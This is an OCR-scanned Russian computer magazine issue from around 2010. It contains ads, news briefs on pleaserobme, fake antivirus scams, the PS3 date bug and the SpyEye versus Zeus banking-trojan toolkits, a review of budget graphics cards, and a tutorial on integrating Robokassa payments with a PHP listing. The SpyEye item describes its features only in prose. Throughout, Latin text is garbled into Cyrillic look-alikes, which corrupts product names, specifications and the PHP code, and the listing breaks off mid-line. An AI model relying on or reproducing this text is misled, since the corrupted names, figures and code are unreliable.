Подключение Ц$В устройств 

А51І5 Е 1 Рііе ЗИагіпд - личный сетевой файл-сервер с доступом через Іпіегпеі 
А51І5 Е 1 Ргіпіег ЗИагіпд - принт-сервер для поддержки одновременной печати 
и сканирования 



ч 



с 



шш.а$и$.ш 



Всемирная гарания 2 года 



Горячая линия: 8-800-100-2787 



КТ-111 зц 

Многофункциональный 
беспроводной 
маршрутизатор 802 . 1 1 N 



Товар сертифицирован, на правах рекламы. 
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ПАРАНОЙЯ, 
АЯ МАЛЕН() 



АРАНОЙЯ, 
(ИИ ТАКОЙ 



ОЗМ - В САМОЛЕТЕ, 
46- НА ЗЕМЛЕ 



Сайт рІеазегоЬте.сот (что пере- 
водится как «пожалуйста, ограбьте 
меня») успел наделать много шума 
буквально за несколько дней работы. 
Дело в том, что ресурс предоставлял 
в открытом доступе помин^но об- 
новляемую базу данныхсадресами 
домов, владельцев которых сейчас 
нет дома. Составлялась база очень 
просто: данные брались все изтого 
же открытого доступа — пользова- 



тели своими руками публиковали их 
вТѵѵіЛег. Авторы проекта сообщают, 
что такого масштабного обществен- 
ного резонанса не ожидали, хотя 
и стремились именно к этому. Хотя 
сейчас проект и приостановлен, 
авторы все равно просятлюдей 
вспомнитьоздоровой паранойе и 
задуматься — стоит л и публиковать 
в сети отчет о каждом своемшагеи 
множество личных данных. 



ЗСАИЗАРЕ СООБЩАЕТ, ЧТО В 2009 
ГОДУ ПОЧТИ В 80% ХАКЕРСКИХ 
АТАК БЫЛИ ИСПОЛЬЗОВАНЫ 
ЗАРАЖЕННЫЕ РОР-ФАЙЛЫ. 
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Ызііпд аІІ ІНозе етріу 
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Государственная комиссия по радиочастотам 1 9 февраля решила вы- 
делить радиочастоты вдиапазоне 1710-1785 МГци 1805-1885 МГцдля 
организации микросетей сотовой связи 05М на борту самолетов. Базовые 
станции, установленные в самолетах, будут работать только на высоте 
болеетрехтысяч метров. Если высота будет меньше, станции будутавтома- 
тически отключаться, чтобы не создавать помехи для наземных служб. Для 
связи с внешним миром базовые станции, подключаются кбортовой сис- 
теме спутниковой связи. Подобную услугу пассажирам уже предоставляют 
такиеавиакомпании, какИе На, АігРгапсе, БиНбапва, Етігаіези другие. 
Одновременно с этим военным прикажут до 15 марта выбрать частоты 
и территории Российской Федерации для тестирования БТЕ (ЕопдТегт 
Еѵоіибоп) — современного мобильного протокола передачи данных. Усо- 
вершенствованная версия СОМА/1)МТ5теоретически может предоставить 
326,4 Мбит/с на прием, и 1 72,8 Мбит/с на отдачу. Уже в ближайшем будущем 
нас ожидает война стандартов: ѴѴі Мах ѵз. БТЕ, причем развертывать 
последний будут сотовые операторы, а это очень большой бонус. Первая в 
мире сеть БТЕ была запущена в декабре 2009 года натерритории Финлян- 
дии и Норвегии. 

НАГЛОСТЬ — 

СЧАСТЬЕ ВИРУСМЕИКЕРА 

Мы уже рассказывали про лже-антивирусы, которые имитируют 
красивую, бурную деятельность по очистке компьютера. Схема проста 
и банальна: сначала юзеру предлагается бесплатная демо-версия, ко- 
торая якобы находит на машине целый выводок всевозможной заразы, 
а чтобы удалить все найденное, «антивирус» просит приобрести полную 
версию программы. Ребята из Зутапіес мне рассказывали, что мо- 
шенники умудряются продавать «куклу» ничем не хуже, чем настоящие 
антивирусные вендоры. Лишним примером успешности такого «биз- 
неса» может служить беспрецедентный по своей наглости ход созда- 
телей фальшивого антивиря Біѵе РС Саге — чуваки завели настоящую 
техподдержку! Поразительно, но в онлайне сидит не бот, нет, ответить 
на вопросы испуганных пользователей будет радживой человек. В ходе 
разговора такой «консультант» предсказуемо уверяет юзеров, что все 
очень плохо и склоняет их к мысли, что им срочно необходимо купить 
полную версию «антивируса» (цена вопроса обычно равна $30-100]. 
Просто и эффективно. 




► 014 
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Ѵ2К СЛУЧИЛОСЬ, НО НА 10 ЛЕТ ПОЗЖЕ 



«Если у кого-то дома есть РІауБіаііоп 3 - НЕ 
ВКЛЮЧАЙТЕ приставку сегодня», стаким сообще- 
нием набросился на всех коллег главный редактор 
«Страны игр». Помните шумиху по поводу Ѵ2к, когда 
обещали массовый сбой компьютеров? Так вот это 
случилось, только десять лет спустя и с Р53. Из-за 
сбоя в системном ПО в ночь с 28 февраля на 1 марта 
2010 года большинство консолей РІауБіаІіоп 3 
(новых 5И гл- ве реи й это не коснулось], принадле- 
жащих жителям Северной Америки, Европы (в том 
числе и России] и Австралии лишились возмож- 
ности подключения к сетевому сервису РІауБіаІіоп 
Иеіѵѵогк. При попытке установить соединение с Р5И 
на экран выводится сообщение об ошибке: «Ап еггог 
баз оссиггеб. Уои баѵе Ьееп зідпеб оиі оі РІауБіаІіоп 
Иеіѵѵогк (800 1 050 Р) » - часть игр отказывалась 
запускаться, ругаясь на неполадку «Еаііеб Іо іпзІаЛ 
ігоріііез. Ріеазе ехИ; уои г дате». При этом системное 
время сбросилось на 1 января 2000 года (попыт- 
ка поменять его обратно приводила кеще одной 



ошибке]. Компания Бопу официально рекомендовала 
временно отказаться от использования пристав- 
ки, пообещав сделать всё возможное в течение 24 
часов, - и сделала. Оказалось, что внутренние часы 



консоли считали 2010 год високосным, что и привело 
ксбою. Проблема была быстро решена, путем смены 
показаний внутренних часов с 29 февраля на 1 марта. 



Ап «лот Ьа5 осей»**' Уои ІИІ ® Ьевп 
(8001050Р) 



ВОЙНЫ РОБОТОВ 

Известный тулкит^еиз давно продается на 
хакерских форумах и в представлении не нуж- 
дается. А вот новичок на этой сцене — ЗруЕуе — 
появился в декабре 2009, но уже наделал много 
шума. Новый тул кит во многом повторяет 2еиз, 
предлагая самые различные грабберы для 
сбора конфиденциальной инфы. Он включает 
билдер для созданиятроя с криптованным 
конфиг-файлом, а также консольную панель 
(С&С] для управления ботнетом. Все довольно 
стандартно, но... в последней версии (1.0.7] по- 
явилась любопытная опция «Кі112еиз». ЗруЕуе 
перехватываетте же вызовы ѴѴіпбоѵѵз АРІ — а 
именно НіІрЗепсІВецііезіА, что используются 
2еиз’ом для передачи информации. В итоге, 
если машина одновременно заражена и ЗруЕуе, 
и 2еиз,то новичок может перехватывать все 
то, что 2еиз передаетсвоему С&С-серверу 
(админка, с которой рассылаются команды для 
ботнета] и, более того, вообще удалить посто- 
роннего троя из системы. Теперь будем ждать 
ответа от2еиз. 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение: 



ТЕЛЕФОН 



ИНТЕРНЕТ 

ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 



• Подключение - в любом месте Москвы и Московской обл. 

* Срок подключения в Москве - 14 дней, в Московской обл, - от 14 до 30 дней* * 
♦ Установка прямого московского телефонного номере 







* Многоканальные телефонные номере 
• 1Р-тслефония 

- Выделенные линии Интернет 
* Корпоративные частные сети (ѴРЫ) 

• Хостинг, услуги бага-центра 

РЛ/7 Телеком ѵ/ѵѵѵл г т 1* ги е-таіЫп^о@гт1,ги (495) 988-8212 

Приглашаем специалистов, имеющих опыт работы в области телекоммуникаций 
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I 






РЕВКІІМ 



I Сергей Никитин 



ЗаррЫге 
Расіеоп НО 4650 



Раш ьеЮгсе 
ВТ 220 





ЗаррЫге 
Расіеоп НР 575 



РаШбеГогсе 
СТ220 Зопіс 





РаШбеРогсе 
6Т220 Зопіс 



ЗаррМіге 
асіеоп НО 
4650 



ЗаррМіге 
Расіеоп НО 



П 



аррМіге 
оп НО 5750 



СКРОМНО. 
НО СО ВКУСЙМ 



ТЕСТИРОВАНИЕ НЕДОРОГИХ ВИДЕОПЛАТ 



РаШ 

іРогсе ОТ 
40 Зопіс 



Не все могут и хотят платить несколько сотен долларов за видеоплату. Да и не всем она 
нужна - старые игрушки и новые нешутеры пойдут и на менее крутом устройстве. 
За сотню долларов или чуть больше можно приобрести вполне приличный 
графический адаптер, что и доказал наш сегодняшний тест. 



ТЕХНОЛОГИИ 

Что, по сути, представляет собой недорогая видеоплата? Это сильно уре- 
занный варианттопового решения, о котором все говорят и который у всех 
на слуху. Гораздо интереснее расписывать преимущества монстра ценой 
в компьютер, чем заниматься исследованием недорогого изделия. Мы 
рассмотрим несколько распространенных мифов о продукции ІМѴЮІАи АТІ, 
которые, в том числе, касаются и продукции из Іоѵѵ-епсІ сегмента. 
Параллельные вычисления и физика. Компанию АТІ часто руга ют за то, что у 
ІЧѴЮІАестьСШАи РЬузХ, а у нее нет ни аналогов, ни поддержки технологий 
конкурента. Это полуп ра вда, та к как есть АТІ ЗФеа появляющаяся а налогом 
США. Авотсфизикой, действительно, уАТІ проблемы (по крайней мере, 
пока]. 

Ширина шины. У изделий ЫѴЮ ІА этот пара метр можетдостигать512бит, а 
вот платы АТІ работаютна 256-битных шинах. Это та к, затоони используют 
быструю памятьСООВб, что помогаетим компенсировать малую ширину 
шины. 

Техпроцесс. Компания І\ІѴЮ ІА производит платы на основе 55 нм-техпроцес- 
са, а вот АТІ успешно работает на 40 нм. Это миф, так как все платы ІМѴЮІА в 
нашем сегодняшнем обзоре работают именно на 40 нм компонентах. 

МЕТОДИКАТЕСТИРОВАНИЯ 

Скорее всего, из прочитанного ты уже понял, что спорить и оперировать от- 
дельными фактами бесполезно. По сути, большинство выпадов посетителей 
форумов — чушь. И нет лучшего способа определить правого, чем испытать 
графические адаптеры и выявить победителя не на словах, а на деле. Помо- 
гутнам в выборелучшегосинтетическийтестЗОМагк2003,атакже игровые 
развлечения Веб Расбоп: Эиеггіііа, Везібепі Еѵіі 5 и Ваітап: АгкЬат Азуіит. 
Финский бенчмаркза пускался при дефолтных настройках, а все приложе- 
ния, за исключением марсианского экшена — при максимальном качестве 
графики и разрешении 1 680x1 050точек, но без сглаживания, анизотропной 



ТЕСТИРУЕМОЕ ОБОРУДОВАНИЕ: 

РАЫТВЕРОРСЕВТ220 
РАЫТ 6ЕР0РСЕ ВТ 220 ЗОНІС 
РАИТ 6ЕР0РСЕ ВТ 240 50МС 
ЗАРРНІРЕРАОЕОІШ4650 
ЗАРРНІРЕ РА0Е0Н НО 4670 ІЛ.ТІМАТЕ 
ЗАРРНІРЕРАОЕОІШ5750 



фильтрации и физики. В Веб Расбоп: Оиеггіііа было выбрано разреше- 
ние 1280x1 024 пикселей, ибо шутер довольно сильно нагружает систему. 
Учитываято, что при покупке бюджетного устройства крайне высокую роль 
играет соотношение его возможностей и цены, мы построили специальную 
диаграмму, на которой хорошо видна взаимосвязьэтих параметров. 



ВАТМАН АГСКНАМ А5ѴШМ, РРЗ 

Раііі беРогсе ОТ 240 Зопіс 
Раііі беРогсе 6 Т 220 Зопіс 
РаШ беРогсе 6 Т 220 
ЗаррЫге Расіеоп Нб 5750 
ЗаррЫге Расіеоп Нб 4670 
ЗаррЫге Расіеоп Нб 4650 

О 10 20 30 40 50 60 70 80 

Самая продвинутая плата на чипе ІМѴІбІА побеждаетза счет опти- 
мизации игры именно под чипы этого производителя 



► 016 
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ѳ 



6Т220 




РаШбеРогсе 

РТООПР — 



ТЕМПЕРАТУРА 



РаШбеІ Раііі ОеРогсе ОТ 240 Бопіс 
Раііі ОеРогсе ОТ 220 Бопіс 
Раііі ОеРогсе ОТ 220 
БаррЫге Васіеоп НО 5750 
БаррЫге Расіеоп НО 4670 
БаррЫге Расіеоп НО 4650 




О 50 100 

Максимальная температура ОРІІ, градус Цельсия 
Температура в простое, градусы Цельсия 



РаШ 
огсе 0Т 
9 Зопіс 




эРогсе 



гпІОЗопіс 



ЗаддМіге 

Ка сіе о іѵ 

1 1 




Платы демонстрируют большую 
разницу температур в простое 
и при нагрузке 



РАИТ 6ЕР0РСЕ 
ОТ 220 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТЕХПРОЦЕСС, НМ:40 
ЧАСТОТА ЯДРА, МГЦ: 635 
ЧАСТОТА ПАМЯТИ, МГЦ: 800 
ТИП ПАМЯТИ: ООВ2 
ОБЪЕМ ПАМЯТИ, МБ: 51 2 
ШИНА ПАМЯТИ, БИТ: 1 28 
ИНТЕРФЕЙС: РСІ ЕХРРЕ55 2.0 
ОІРЕСТХ: 10.1 






Небольшая и недорогая плата на основе чипа ІМѴЮІА ОеРогсе ОТ 220. Не- 
большие размеры позволят разместить ее практически в любом корпусе, 
что дает возможность модернизировать ею старые ПК, системная плата 
которых, тем не менее, должна быть оснащена разъемом РСІ-Е. На ней, 
помимо современных разъемов РѴІ и НйМІ присутствует и ѴОА, что, 
опять же, плюс, при установке в старенький компьютер. Из приятных мо- 
ментов стоит отметить небольшой заводской оверклокинг— инженеры 
РаШ: подняли тактовые частоты памяти и процессора на 10 МГц по срав- 
нению с базовой версией чипа. Как говорится, пустячок, а приятно. Хотя 
плата оснащена небольшим вентилятором и имеет слегка повышенные 
частоты, она ни разу не нагрелась выше 51 градуса по Цельсию.. 



Установив памятьтипа ООР2 производитель, конечно, сэкономил и 
снизил стоимость платы, но вотее производительность отэтого явно не 
выиграла. Свою роль сыграл и не самый производительный чипсет. В 
общем, не самая высокая цена объясняется не самой высокой произво- 
дительностью. 



Зарртге 
Расіеоп НР 5750 




РАИТ 6ЕР0КСЕ 
6Т220 30ШС 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТЕХПРОЦЕСС, НМ:40 
ЧАСТОТА ЯДРА, МГЦ: 650 
ЧАСТОТА ПАМЯТИ, МГЦ: 900 
ТИП ПАМЯТИ: СООРЗ 
ОБЪЕМ ПАМЯТИ, МБ:512 
ШИНА ПАМЯТИ, БИТ: 128 
ИНТЕРФЕЙС: РСІ ЕХРВЕ55 2.0 
ОІРЕСТХ: 10.1 







Слово “Зопіс” в названииуказываетна серьезный апгрейд устройства. 

В данной видеоплате компания исправила все ошибки и недоработки, 
имеющиеся в Ра Ш: ОеРогсе СТ 220. Во-первых, изменился тип памяти 
— теперь это более быстрая и современная бООВЗ, которая больше не 
является узким местом системы, ограничивая ее производительность. 
Во-вторых, чип и память разогнаны не на жалкие 10 МГц а до 650 и 900 
МГц, соответственно ( это хороший показатель, с учетом базовых 625 
и 790 МГц]. Несмотря нато, что референсная плата оснащается одним 
гигабайтом памяти, Ра [К оставила своему детищутолько половину этого 
объема. В принципе, неплохое решение, таккак 128-битная шина памя- 
ти врядли позволила бы прочувствовать всю прелесть 1 Гб видео-ОЗУ, 
зато цену устройства такой ход снизил. Из разъемов на плате присутству- 
ютѴОА, НИМІ и ОѴІ. Цена возросла совсем ненамного, несмотря на массу 
улучшений. 



Недостатком устройства является его система охлаждения. Когда 
нагрузка на плату была высокой, звук от кулера крайне раздражающе 
шумел. 
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РЕВКІІМ 



ПРОИЗВОДИТЕЛЬНОСТЬХЦЕНА 



Раііі беРогсе ОТ 240 Бопіс 
Раііі беРогсе ОТ 220 Бопіс 
Раіі* беРогсе 6 Т 220 
БаррМге Расіеоп НО 5750 
БаррМге Расіеоп НО 4670 
БаррМге Расіеоп НО 4650 




0.00000 5.00000 10.00000 15.00000 20.00000 25.00000 



Произ-ть Ваітап: АгкИат, Авуіит, РРБ/тыс.руб. 
■ Произ-ть Резісіепі Еѵііб, РРБ/тыс.руб. 

Произ-ть РесІ Расііоп: Оиета, РРБ/тыс.руб. 




Соотношение цены 
и производительности 
графических плат 



РАИТ 6ЕР0РСЕ 
6Т 240 Бопіс 



КЕ8ЮЕИТ ЕѴИ 5. РР5 

Раііі беРогсе ОТ 240 Бопіс 
Раііі беРогсе ОТ 220 Бопіс 
Раіі* беРогсе 6Т 220 
БаррМге Расіеоп Нб 5750 
БаррМге Расіеоп Нб 4670 
БаррМге Расіеоп Нб 4650 

0 10 20 30 40 50 60 70 80 

Половина плат 
показала вполне себе 
неплохой результат. 




8АРРНІКЕ ШЕОМ 
НР 4650 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



ТЕХПРОЦЕСС, НМ: 40 
ЧАСТОТАЯДРА, МГЦ: 585 
ЧАСТОТА ПАМЯТИ, МГЦ: 945 
ТИП ПАМЯТИ: ОООП 5 
ОБЪЕМ ПАМЯТИ, МБ: 1024 
ШИНА ПАМЯТИ, БИТ: 128 
ИНТЕРФЕЙС: РСІ ЕХРПЕ55 2.0 
6 ІРЕСТХ: 1 0.1 



□ □ 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТЕХПРОЦЕСС, НМ: 55 
ЧАСТОТАЯДРА, МГЦ: 600 
ЧАСТОТА ПАМЯТИ, МГЦ: 700 
ТИП ПАМЯТИ: бООПЗ 
ОБЪЕМ ПАМЯТИ, МБ: 51 2 
ШИНА ПАМЯТИ, БИТ: 128 
ИНТЕРФЕЙС: РСІ ЕХРПЕ55 2.0 
6 ІРЕСТХ: 1 0.1 




□ □ 



+ 

Самая производительная видеоплата на самом продвинутом чипе ІМѴЮІА 
в нашем сегодняшнем обзоре. Каки полагается самому продвинутому де- 
вайсу, она оснащена целым гигабайтом видеопамяти СООР5, что не может 
не радовать пользователей и не сказаться самым положительным образом 
на скорости работы. Добавление слова Бопіс в название объясняет не- 
большой оверклокингпамяти (на 95 МГц] и чипсета (на 35 МГц), что тоже по- 
ложительно повлияло на результаты тестов. В итоге, данная плата уступила 
только топовой плате на чипсете АТІ Вабеоп — БаррЫге Вабеоп НО 5750. Из 
други х досто и н ств устро й ства сто ит в ы дел ить с и сте му охл ажде н и я , которая 
не просто хорошо справляется со своими обязанностями, но и делаетэто 
практически бесшумно. 

Но за все это приходится платить свою цену — система охлажде- 
ния занимает два слота, также, каку устройств верхнего ценового 
диапазона, что следует обязательно учесть при покупке этой платы, 
иначе каким-то девайсам в системном блоке придется потесниться. 



+ 

Еслитебе не нравятся маленькиеустройства, потому что они, потвоему 
мнению, не могут работать быстро, то эта плата создана для тебя. 
Несмотря на принадлежность к сегменту Іо\л/-епсІ, плата имее довольно 
большие габариты. Возможно, благодаря этому, имея невысокую цену, 
видеоплата БаррЫге Вабеоп Нй 4650 показала оченьхорошие резуль- 
таты в двух нашихтестовых играх. Плата несет на борту порты НбМІ, ѴОА 
и 6ѴІ, что открываетобширные просторы для подключения разнообраз- 
ныхустройств. Кдостоинствам стоит отнести и довольно производитель- 
ную систему охлаждения. 

К сожалению, у платы есть и недостатки. К ним, в частности, следует 
отнести очень низкую производительность в игре Веб Еасбоп: биеггіііа. 
При большой нагрузке система охлаждения начинает издавать очень 
громкий шум. Габариты устройства велики, профиль его высок, поэтому 
перед тем, какпокупать данный девайс, хорошенько проверьсвой кор- 
пус на предмет свободного места. 



► 018 
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РЕВРАСТІОГШЕРКШ, РРЗ 

Раііі ОеРогсе ОТ 240 Бопіс 
Раііі ОеРогсе 6 Т 220 Бопіс 
Раііі ОеРогсе ОТ 220 
БаррМге Расіеоп НО 5750 
БаррМге Расіеоп НО 4670 
БаррМге Расіеоп НО 4650 

О 5 10 15 20 25 30 



ЗОМАРК 2003, БАЛЛЫ 

Раііі беРогсе 6Т 240 Бопіс 
Раііі беРогсе 6Т 220 Бопіс 
Раііі ОеРогсе ОТ 220 
БаррМге Расіеоп НО 5750 
БаррМге Расіеоп НО 4670 
БаррМге Расіеоп НО 4650 

О 10000 20000 30000 40000 50000 



Комфортно играть 
в эту игру можно 
только с платой 
БаррМге Расіеоп Нб 
5750 




5АРРНІРЕ ШЕОЫ 
НО 4670 ІШітаІе 



Сравнительные 

синтетические 

результаты. 

Как видно, 

БаррМге Расіеоп Нб 
5750 находится 
вне конкуренции. 




ЗАРРНІРЕ РАОЕОЫ 
НР 5750 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТЕХПРОЦЕСС, НМ: 55 
ЧАСТОТА ЯДРА, МГЦ: 750 
ЧАСТОТА ПАМЯТИ, МГЦ: 873 
ТИП ПАМЯТИ: ОООВЗ 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТЕХПРОЦЕСС, НМ: 40 
ЧАСТОТА ЯДРА, МГЦ: 700 
ЧАСТОТА ПАМЯТИ, МГЦ: 1 1 50 
ТИП ПАМЯТИ: Ой ОВ -5 
ОБЪЕМ ПАМЯТИ, МБ: 1024 
ШИНА ПАМЯТИ, БИТ: 1 28 
ИНТЕРФЕЙС: РСІ ЕХРВЕ55 2.0 
ОІРЕСТХ: 1 1 



□ 





Некоторые люди таклюбяттишину, что стараются собрать компьютер из 
максимально бесшумных компонентов. Еслиты по какой-то причинехо- 
чешь видеоплату, шум от которой минимален, то присмотрись кЗаррЫге 
Расіеоп НИ 4670 ІІШтаіе, которая вообще бесшумна по причинетого, что 
ее система охлаждения не имеет ни одного подвижного элемента. Плата 
похожа на сэндвич, в котором хлеб — это два радиатора, а начинка — 
сама плата. Радиаторы соединены тепловыми трубками. Такая система 
показала весьма неплохую работу, и это при том, что плата сама по себе 
довольно производительная. 



Самая мощная плата в нашем сегодняшнем тесте. Продвинутый чипсет 
обеспечиваетей очень высокую производительность, стоит отметить, 
что это единственное устройство в нашем обзоре, которое поддерживает 
бігесіХ 1 1 . Кроме того, оно обладает таким интересным функционалом, 
как поддержка вывода изображения одновременно на три монитора, что 
может использоваться какдля игр, таки для более серьезныхзанятий. И, 
кто бы сомневался, данная плата стала лидером в нашихтестах на про- 
изводительность. Нужно добавить, что систему охлаждения практически 
не слышно даже в моменты пиковой нагрузки. 



Но нужно отметить, что разброс температуру нее довольно велик (в про- 
стое и максимальный). Кроме того, из-за применения такого решения 
система занимаетдва слота, а не один, поэтому потенциальному поку- 
пателю стоит провести инспекцию наличия свободного пространства 
внутри системного блока. 



Занимает, правда, система охлаждения два слота, и вообще плата 
довольно габаритная. Цена устройства очень высока, она почти вдвое 
превышает стоимость большинства других изделий из нашего теста. 



выводы 

Что же, недорогие платы доказали, что могут 
обеспечивать нормальную производитель- 



ность в играх. Конечно, есть у них и минусы, 
но главный их плюс — цена. Призом “Выбор 
редакции” награждается ЗаррЫге Расіеоп 
НО 5750, абсолютный лидер в скоростных 



тестах, построенный на очень продви- 
нутом чипе. А “Лучшая покупка” это явно 
Раб! ОеРогсе ОТ 220 Зопіс — недорогая и 
быстрая..зс 
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Настраиваем прием платежей 
на своем сайте 



Есть идея! Да, совершенно точно этот проект сможет принести деньги! 
Пусть небольшие, но деньги. Но стоит ли затевать весь сыр-бор, если я не 
смогу организовать прием платежей? Будут ли связываться со мной круп- 
ные платежные системы или отправятлесом? Да и насколько сложно 
это технически? Вот и разберемся на практике. 



П омнится, много лет назад я хотел 
организовать прием платежей 
через ѴѴеЬтопеу. Все желание про- 
пало, когда я прочитал, сколько 
волокиты с этим связано: невнят- 
ные технические решения, необходимость 
получения сертификата. Словом, игра не 
стоила свеч. С тех пор, конечно, многое 
изменилось, но проблемы отчасти остались 
те же. Если говорить о серьезном проекте 
с большими инвестициями, то проблем в 
сотрудничестве с платежными системами 
быть не должно. Но совсем другое дело 
— скажем, совсем небольшой Интернет- 
магазин, у которого на первых порах совсем 
нет оборота. А его требуют, выдвигают усло- 
вия и, более того, заставляют пройти все 
круги ада, оформляя всевозможные доку- 
менты. Вот и получается логический тупик: 
пока у тебя нет нормальной клиентской 
базы и репутации, ты не можешь полно- 
ценно сотрудничать с разными платежными 
системами. А пока у тебя нет возможности 
принимать платежи, о какой клиентской 
базе может идти речь? К счастью, есть при- 
ятные исключения. Если ты прочитал статью 
«Налаживаем систему приема платежей» 
(или ее РОЕ-версию на нашем диске], то 
должен знать, каким образом можно при- 
нять платеж по кредитной карте или по 5М5. 
Особо тепло мы отзывались о РоЬоказза'е 
[ ѵѵѵѵѵѵ.гоЬока55а.ги ] ; позволяющей избавить- 



ся от геморроя общения напрямую с разны- 
ми системами оплаты. Задумайся, хочется 
ли тебе договариваться по отдельности с 
каждой системой электронных платежей, 
получать какие-то непонятные сертификаты, 
высылая кипу юридических бумаг, и ожидая, 
что какой-нибудь манагер проверит, все ли 
ты выслал и правильно ли заполнил анкеты. 
За небольшой процент с каждой транзак- 
ции можно одним махом подключить самые 
разные варианты платежей, предоставив 
пользователям максимальное удобство и 
право выбора. Хочешь прием платежей 
через электронные деньги (Яндекс. Деньги, 
ѴѴеЬтопеу и другие)? Запросто! Хочешь 
предложить самый простой вариант опла- 
ты — через 5М5? Тоже нет проблем. Для 
многих оплата по кредитной карте стала 
нормой — и ты можешь это предложить. Ах 
да, забыли про пресловутые терминалы для 
оплаты? Поддерживаются, сразу 9 различ- 
ных сетей. И это далеко не весь список. 

При этом ты ведешь бухгалтерию только с 
одной системой, предоставляешь пользовате- 
лям удобный единый интерфейс — и отдаешь 
5% с продаж за отсутствие головной боли. Но 
в данной ситуации, не менее важно и другое. 
Система крайне лояльно хорошо относится 
к небольшим проектам, в том числе самым 
начинающим! А значит, имея желание, пря- 
мые руки, минимальное знание РНР (+ сигі] и 
фрейморка ] О и е гу, тебе под силу поднять свой 



маленький бизнес в Сети. 

ОРГАНИЗАЦИЯ ПЛАТЕЖА ЧЕРЕЗ 
Р0В0КАЗЗА 

В общем-то, язык программирования 
совсем необязательно должен быть РНР, 
но мы возьмем его для простоты примера. 
Взаимодействие с РоЬоКазза осуществляется 
через специальный АРІ-интерфейс. Другими 
словами, есть несложные правила обмена 
данными между электронным магазином и 
сервисом для приема. Если следовать прави- 
лам, то работать с системой можно как угодно: 
будь у тебя скрипты на РНР, Регі или, скажем, 
А5Р или РуТЬоп — неважно. Один из способов 
передать сообщение сервису — сформировать 
НТТР-запрос и передать его методом СЕТ или 
Р05Т по специальному ЦРЕѵ ЫірзУ/тегсЬапЕ 
гоЬохсЬапде.сот . Далее магазин отправляет 
пользователя поданному адресу для произ- 
ведения им оплаты. Общая схема взаимодей- 
ствия магазина и платежки РоЬоКазза выгля- 
дит следующим образом: 

1. Клиент магазина переходит по специально- 
му ІІРЕу и оказывается на сайте РоЬоКазза, 
еще раз читает все параметры заказа и 
сверяет стоимость, после чего подтверждает 
оплату. 

2 . РоЬоКазза обменивается данными стой 
платежной системой, через которую хочет 
произвести оплату клиент. Данный процесс 
скрыт от наших глаз. В общем-то, ту комис- 
сию, которую взымает РоЬоКазза, мы платим 



► 020 
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Журнал Хакер. Январь. 

Цен* 210 рублей. 

Выберите способ оплаты: 

деньги ѣ СгесІЁ' 



Яндекс .Деньги МопеуМаіІ КУК ѴУеЬСгеііз КШ 

Цааі 210,00 руб. Цена; 210.00 ру б. Пена: 210,00 руб. 



0 ]/У\ !Н 



ПВК 

Мопеу 



Б^нк- ВКонтакте КЦН Единый Кошелек КЦК КВК МЬпеѵ КШ 

210.00 руб. 221.06 руб. 



ЕаіуРау 



Интерфейс для покупки журнала на нашем тесто- Исходнитки аіах-парсера ХМІ. 
вом сайте: ЬіФко.ги/Іе5І/ха/раутепІ5.рЬр?іІет=і 



как раз за то, чтобы не задумываться, как 
реально происходит транзакция с конечной 
платежной системой. 

3. РоЬоКазза отправляет подтверждение об 
оплате РезиЬ-скрипту магазина. Если клиент 
отказался от оплаты, то он будет перена- 
правлен по ИРЬ-адресу страницы Раіі (здесь 
ты можешь попытаться выяснить у клиента, 
что же ему не понравилось или что не полу- 
чилось), а в случае успешного проведения 
платежа — страницы Зиссезз (обязательно 
поблагодари клиента и пожелай ему всего 
хорошего). ІІРЬ-адреса РезиІТ-скрипта и стра- 
ниц Зиссезз, Раіі могут быть указаны и изме- 
нены в личном кабинете на сайте РоЬоКазза 
в любое время. 

Теперь о каждом пункте подробнее: 

В листинге ниже приведен алгоритм 
формирования ІІРЬ-адреса, по которому мы 
должны перенаправить клиента для соверше- 
ния оплаты: 

//Номер заказа 
$іпѵ_іс! = 0; 

//Дополнительные параметры запроса 
$зЪ.р_іСет = $іСет; 

$зНр_изег = ' ТезШзег'; 

/ /подпись 

$сгс = ГПСІ5 ( " $тг\Ь_1одіп : $оиС_ 
зитт: $іпѵ_іс1: $тг!і_разз1 : 81ір_ 
іЦет=$зЬр_іЦет: 8Нр_изег=$зЬр_ 
изег " ) ; 

/ / ф орму миру ем ІГОЬ 

$иг1 = "ТШДрз : / /тегсІіапЦ . 

гоЬохсНапде . сот/ Іпсіех . 

азрх?МгсЬ.Ьодіп=$тг]з_ 

1 одіп&ОиС 8ит= $ оиС_зиіт& ІпѵІ с1 = $ іпѵ_ 
і сІ&Бе з с = $ і п ѵ_с!е з с & 8Нр_ 
і С ет= $ зНр_і С ет& 81ір_и з ег = $ зЬр_ 
изег&8ідпаЦигеѴа1ие=$сгс " ; 

Разберемся с каждым из параметров запроса, 
передаваемого методом (ЗЕТ. 

МгсЫодіп — логин мерчанта в системе 



РоЬоКазза. В исходниках используется тесто- 
вый логин — бето. 

Параметр ОіііЗіШІ — стоимость товара/заказа 
в магазине. 

Параметр ІПѴІСІ — номер заказа в магазине. 
Если передать ноль в качестве значения дан- 
ного параметра, то номер будет сгенерирован 
непосредственно Робокассой. Так можно 
делать, если для оплаты в твоем магазине 
используется только одна платежная система 
(в нашем случае — это единый интерфейс 
РоЬоКазза), либо для каждой платежки заве- 
дена отдельная таблица в базе данных для 
учета всех операций. 

Соответственно Иезс — это описание това- 
ра/заказа, которое будет отображаться для 
пользователя, после того, как он перейдет по 
ІІРЕу. 

Дополнительные параметры 5Ьр_і1:епп, 5Ьр_ 
изег требуются для однозначной идентифика- 
ции платежа: 

ЗНр ІІет — идентификатор товара в магазине. 
$Нр_и$ег — идентификатор пользователя 
(например, можно запросить ФИО пользо- 
вателя и передавать его в этом параметре). 
Обрати внимание, в нашем примере мы не 
задаем номер заказа (ІпѵИ), поэтому когда от 
РоЬоКазза будет получен ответ о проведении 
платежа, то однозначно идентифицировать, 
кто и за что заплатил, можно только по допол- 
нительным параметрам в запросе/ответе. 
Последний параметр, который мы еще не 
рассмотрели, ВідпаІигеѴаІие — это цифровая 
подпись, которая представляет собой зна- 
чение хеш-функции тб5 от строки "$тгЬ_ 
І0дІП:$0иІ_5иіТ1І71:$ІПѴ_ІСІ:$ППгЬ_ра55І :5Ьр_ 
